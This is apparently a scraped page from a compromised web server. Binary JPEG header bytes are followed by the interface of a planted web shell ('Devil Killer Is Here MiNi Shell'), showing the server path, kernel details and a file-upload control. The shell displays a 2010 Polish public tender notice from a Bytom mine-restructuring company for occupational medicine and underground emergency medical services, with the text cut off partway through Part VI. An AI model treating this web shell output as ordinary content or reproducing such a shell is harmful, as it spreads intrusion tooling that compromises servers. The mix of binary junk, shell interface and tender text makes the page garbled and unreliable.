JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20100921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20100921/258509-N-2010.html

<p class="kh_header"><b>Bytom: Udzielanie świadczeń medycyny pracy oraz świadczenie całodobowych usług medycznych w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu.</b><br>
<b>Numer ogłoszenia: 258509 - 2010; data zamieszczenia: 21.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielanie świadczeń medycyny pracy oraz świadczenie całodobowych usług medycznych w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I: Udzielanie świadczeń medycyny pracy w zakresie: badań wstępnych okresowych, kontrolnych, końcowych oraz wynikających ze zmiany stanowiska pracy, specjalistycznych badań konsultacyjnych stanowiących część badań profilaktycznych, badań psychologicznych dla pracowników zatrudnionych na rejonach: Saturn, Sosnowiec, Paryż, Grodziec, Porąbka- Klimontów, Niwka - Modrzejów, Katowice, Kleofas, Siemianowice, Jan Kanty, Dębieńsko. 
Część II:	Udzielanie świadczeń medycyny pracy w zakresie: badań wstępnych, okresowych, kontrolnych, końcowych oraz wynikających ze zmiany stanowiska pracy,  specjalistycznych badań konsultacyjnych stanowiących część badań profilaktycznych, badań psychologicznych dla pracowników zatrudnionych na rejonach: Pstrowski, Szombierki, Powstańców Śląskich - Bytom I, Gliwice. 
Część III:	Świadczenie całodobowych usług medycznych w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu na rejonach: Saturn, Sosnowiec, Paryż, Grodziec, Porąbka- Klimontów, Niwka - Modrzejów, Katowice, Kleofas, Siemianowice, Jan Kanty.
Część IV:	Świadczenie całodobowych usług medycznych w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu na rejonach: Pstrowski, Szombierki, Powstańców Śląskich - Bytom I, Gliwice.
Część V:	Świadczenie całodobowych usług medycznych w zakresie udzielania pomocy  medycznej na dole i powierzchni zakładu na rejonie: Dębieńsko.
Część VI:	Świadczenie usług medycyny pracy w zakresie badań wstępnych, okresowych, kontrolnych i końcowych oraz profilaktycznej opieki zdrowotnej dla pracowników Spółki  Restrukturyzacji Kopalń S.A. Oddziału w Sosnowcu, Zakładu Kopalnie Węgla Kamiennego w całkowitej likwidacji.
Część VII:	Świadczenie usług medycyny pracy w zakresie badań wstępnych, okresowych i kontrolnych oraz profilaktycznej opieki zdrowotnej dla pracowników Spółki Restrukturyzacji Kopalń  S.A.w Bytomiu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 4 290,00 zł ( słownie: cztery tysiące dwieście dziewięćdziesiąt złotych  00/100 zł) w tym: 
-	dla Części I: 	1 500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100)
-	dla Części II: 	600,00 zł (słownie: sześćset złotych 00/100)
-	dla Części III:	700,00 zł (słownie: siedemset złotych 00/100)
-	dla Części IV: 	600,00 zł (słownie: sześćset złotych 00/100)
-	dla Części V:	600,00 zł (słownie: sześćset złotych 00/100)
-	dla Części VI:	  90,00 zł (słownie: dziewięćdziesiąt złotych 00/100)  
-	dla Części VII:	200,00 zł (słownie: dwieście złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien specjalizować się na rynku w wykonywaniu usług                             o charakterze i złożoności porównywalnej z zakresem zamówienia oraz udokumentować realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę lub usługę porównywalną z przedmiotem zamówienia o wartości minimum: Część I: 20 000,00 zł, Część II: 7 000,00 zł brutto, Część III: 12 000,00 zł brutto Część IV: 10 000,00 zł brutto, Część V: 10 000,00 zł brutto, Część VI: 1 600,00 zł brutto, Część VII: 3 500,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami zdolnymi do wykonania zamówienia posiadającymi uprawnienia zgodnie z rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. Nr 69, poz. 332 z późn. zm.), oraz Wykonawca winien dysponować osobami zdolnymi do świadczenia całodobowych usług medycznych w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu, co należy udokumentować 
w formie stosownego oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.3.5	Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków obowiązany jest przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej,  w których te podmioty posiadają rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową tych podmiotów, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 2, 2a, 2b, 2c, 2d do druku OFERTA.          
2.Projekt umowy - załącznik nr 6,  6a, 6b i 6c do druku OFERTA.
3.Oświadczenie Wykonawcy w związku z pkt. 5.3.4 SIWZ - załącznik nr 7 do druku OFERTA  tj. Wykonawca dołączy do druku OFERTA oświadczenie o spełnieniu warunku, że miejsce wykonywanych usług będzie mieściła się w przypadku Części I w odległości do 10 km od siedziby Zakładu CZOK w Czeladzi, Czeladź 41-253, ul. Kościuszki 9, w przypadku Części II w odległości do 10 km od siedziby Zakładu CZOK rejon Pstrowski, Zabrze 41-808, ul. Szybowa 2, przypadku Części VI w odległości do 10 km od siedziby Oddziału Zakładu Kopalnie Węgla Kamiennego w całkowitej likwidacji 41-219 Sosnowiec, ul. Kosynierów 44 oraz w przypadku Części VII w odległości do 10 km od siedziby Spółki Restrukturyzacji Kopalń S.A., 41-914 Bytom, ul. Strzelców Bytomskich 207. 
4.Wypełniony formularz cenowy - załącznik nr 8 i 8a do druku OFERTA</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, że niedopuszczalna jest zmiana postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność takiej zmiany wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a które powodują obiektywna i uzasadniona konieczność zmiany treści zawartej umowy, w tym także w przypadku ustawowej zmiany obowiązującej stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SRK S.A. ul. Strzelców Bytomskich 207, 41-914 Bytom - 30,00 + VAT w przypadku odbioru osobistego (gotówka) lub pocztą (za zaliczeniem)- w przypadku pobrania SIWZ ze strony internetowej - bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2010 godzina 11:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - sekretariat Spółki (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I: Udzielanie świadczeń medycyny pracy w zakresie:  badań wstępnych okresowych, kontrolnych, końcowych oraz wynikających ze zmiany stanowiska pracy specjalistycznych badań konsultacyjnych stanowiących część badań profilaktycznych  badań psychologicznych dla pracowników zatrudnionych na rejonach: Saturn, Sosnowiec, Paryż, Grodziec, Porąbka- Klimontów, Niwka - Modrzejów, Katowice, Kleofas, Siemianowice, Jan Kanty, Dębieńsko..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usługi:
1. Badania będą przeprowadzane dla:
a) Pracowników zatrudnionych pod ziemią i na powierzchni - badania okresowe-wysokościowe dla ok. 355 pracowników
b) pracowników po nieobecności w pracy powyżej 30 dni - badanie kontrolne,
c) pracowników odchodzących z zakładu z tytułu nabycia uprawnień emerytalnych lub rentowych - badanie końcowe,
d) pracowników nowoprzyjętych - badanie wstępne,
e) pracowników wykonujących pracę o szczególnym narażeniu życia lub zdrowia - badanie psychologiczne (dla ok. 245 pracowników). 
2. Badania wstępne, okresowe, kontrolne i końcowe będą w swym zakresie obejmowały: badania lekarzy profilaktyków, badania labolatoryjne, badania lekarzy specjalistów w zakresie badań: 
a) neurologicznych,
b) laryngologicznych,
c) okulistycznych,
d) kardiologicznych,
e) badania RTG i EKG.
3. Zabezpieczenie pomocy psychologicznej w razie wypadku lub wystąpienia zdarzenia niebezpiecznego dla pracowników, ratowników górniczych oraz członków ich rodzin. 
4. Badania wstępne, okresowe, kontrolne i końcowe obejmujące podstawowe badania laboratoryjne i badania lekarzy profilaktyków - będą każdorazowo określone w skierowaniach imiennych, z określeniem stanowiska pracy każdego pracownika, wystawianych przez Zamawiającego.
5. Badania wstępne, okresowe, kontrolne i końcowe jak wyżej poszerzone o badania lekarzy specjalistów w zakresie badań neurologicznych, laryngologicznych, okulistycznych i kardiologicznych oraz badań RTG i EKG - będą każdorazowo określone w skierowaniach imiennych, z określeniem stanowiska pracy każdego pracownika, wystawianych przez Zamawiającego.
6. Badania psychologiczne - będą każdorazowo określone w skierowaniach imiennych, z określeniem stanowiska pracy każdego pracownika, wystawianych przez Zamawiającego. 
7. Pomoc psychologiczna w razie wypadku lub wystąpienia zdarzenia niebezpiecznego dla pracowników, ratowników górniczych oraz członków ich rodzin będzie odbywała się na podstawie zamówienia wystawionego przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: Udzielanie świadczeń medycyny pracy w zakresie:  badań wstępnych, okresowych, kontrolnych, końcowych oraz wynikających ze zmiany stanowiska pracy specjalistycznych badań konsultacyjnych stanowiących część badań profilaktycznych, badań psychologicznych dla pracowników zatrudnionych na rejonach: Pstrowski, Szombierki,  Powstańców Śląskich - Bytom I, Gliwice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Badania będą przeprowadzane dla:
a) pracowników zatrudnionych pod ziemią i na powierzchni - badania okresowe-wysokościowe dla ok. 120,
b) pracowników po nieobecności w pracy powyżej 30 dni - badanie kontrolne,
c) pracowników odchodzących z zakładu z tytułu nabycia uprawnień emerytalnych lub rentowych - badanie końcowe,
d) pracowników nowoprzyjętych - badanie wstępne,
e) pracowników wykonujących pracę o szczególnym narażeniu życia lub zdrowia -  badanie psychologiczne (dla ok. 65 pracowników). 
2. Badania wstępne, okresowe, kontrolne i końcowe będą w swym zakresie obejmowały:
- badania lekarzy profilaktyków,
- badania labolatoryjne,
- badania lekarzy specjalistów w zakresie badań: 
a) neurologicznych,
b) laryngologicznych,
c) okulistycznych,
d) kardiologicznych.
e) badania RTG i EKG.
3. Zabezpieczenie pomocy psychologicznej w razie wypadku lub wystąpienia zdarzenia niebezpiecznego dla pracowników, ratowników górniczych oraz członków ich rodzin.
4. Badania wstępne, okresowe, kontrolne i końcowe obejmujące podstawowe badania laboratoryjne i badania lekarzy profilaktyków - będą każdorazowo określone w skierowaniach imiennych, z określeniem stanowiska pracy każdego pracownika, wystawianych przez Zamawiającego.
5. Badania wstępne, okresowe, kontrolne i końcowe jak wyżej poszerzone o badania lekarzy specjalistów w zakresie badań neurologicznych, laryngologicznych, okulistycznych i kardiologicznych oraz badań RTG i EKG - będą każdorazowo określone w skierowaniach imiennych, z określeniem stanowiska pracy każdego pracownika, wystawianych przez Zamawiającego.
6. Badania psychologiczne - będą każdorazowo określone w skierowaniach imiennych, z określeniem stanowiska pracy każdego pracownika, wystawianych przez Zamawiającego. 
7. Pomoc psychologiczna w razie wypadku lub wystąpienia zdarzenia niebezpiecznego dla pracowników, ratowników górniczych oraz członków ich rodzin będzie odbywała się na podstawie zamówienia wystawionego przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III: Świadczenie całodobowych usług medycznych w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu na rejonach: Saturn, Sosnowiec, Paryż, Grodziec, Porąbka - Klimontów, Niwka-Modrzejów, Katowice, Kleofas, Siemianowice, Jan Kanty..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Lekarze świadczący całodobowe usługi medyczne w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu pełniący swoje obowiązki 
w postaci dyżurów telefonicznych powinni stawić się na miejsce zdarzenia wskazanym przez dyspozytora ruchu dla Części III w jak najkrótszym czasie, tj. max. do 20 min.
2.	Świadczenie całodobowych usług medycznych odbywać się będzie poprzez pełnienie dyżurów telefonicznych przez lekarzy posiadających uprawnienia do zjazdu na dół, a obowiązek ich stawienia się nastąpi w przypadku, gdy pracownik ulegnie wypadkowi przy pracy lub zachoruje w czasie pracy.
3.	Na rejonach Zakładu CZOK w Części III zamówienia zatrudnionych jest 277 pracowników dołowych i 81 pracowników powierzchni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV: Świadczenie całodobowych usług medycznych w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu na rejonach: Pstrowski, Szombierki, Powstańców Śląskich - Bytom I, Gliwice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usługi:	 
1.	Lekarze świadczący całodobowe usługi medyczne w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu pełniący swoje obowiązki w postaci dyżurów telefonicznych powinni stawić się na miejsce zdarzenia wskazanym przez dyspozytora ruchu dla Części IV w jak najkrótszym czasie, tj. max. do 20 min.
2.	Świadczenie całodobowych usług medycznych odbywać się będzie poprzez pełnienie dyżurów telefonicznych przez lekarzy posiadających uprawnienia do zjazdu na dół, a obowiązek ich stawienia się nastąpi w przypadku, gdy pracownik ulegnie wypadkowi przy pracy lub zachoruje w czasie pracy .
3.	Na rejonach Zakładu CZOK w Części IV zamówienia zatrudnionych jest 144 pracowników dołowych i 28 pracowników powierzchni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V: Świadczenie całodobowych usług medycznych w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu na rejonie: Dębieńsko..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usługi:
1.	Lekarze świadczący całodobowe usługi medyczne w zakresie udzielania pomocy medycznej na dole i powierzchni zakładu pełniący swoje obowiązki w postaci dyżurów telefonicznych powinni stawić się na miejsce zdarzenia wskazanym przez dyspozytora ruchu dla Części V w jak najkrótszym czasie, tj. do max.  20 min.
2.	Świadczenie całodobowych usług medycznych odbywać się będzie poprzez pełnienie dyżurów telefonicznych przez lekarzy posiadających uprawnienia do zjazdu na dół, a obowiązek ich stawienia się nastąpi w przypadku, gdy pracownik ulegnie wypadkowi przy pracy lub zachoruje w czasie pracy .
3.	Na rejonach Zakładu CZOK w Części V zamówienia zatrudnionych jest 84 pracowników dołowych i 5 pracowników powierzchni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI: Świadczenie usług medycyny pracy w zakresie badań wstępnych, okresowych, kontrolnych i końcowych oraz profilaktycznej opieki zdrowotnej dla pracowników Oddziału SRK S.A. w Sosnowcu Zakładu Kopalnie Węgla Kamiennego w całkowitej likwidacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres usługi:
1.	Badania będą przeprowadzane dla:
a)	pracowników  administracyjno - biurowych - badania okresowe, dla ok. 
33 pracowników,
b)	pracowników po nieobecności w pracy powyżej 30 dni - badanie kontrolne,
c)	pracowników odchodzących z zakładu z tytułu nabycia uprawnień emerytalnych lub rentowych - badanie końcowe,
d)	pracowników nowoprzyjętych - badanie wstępne.
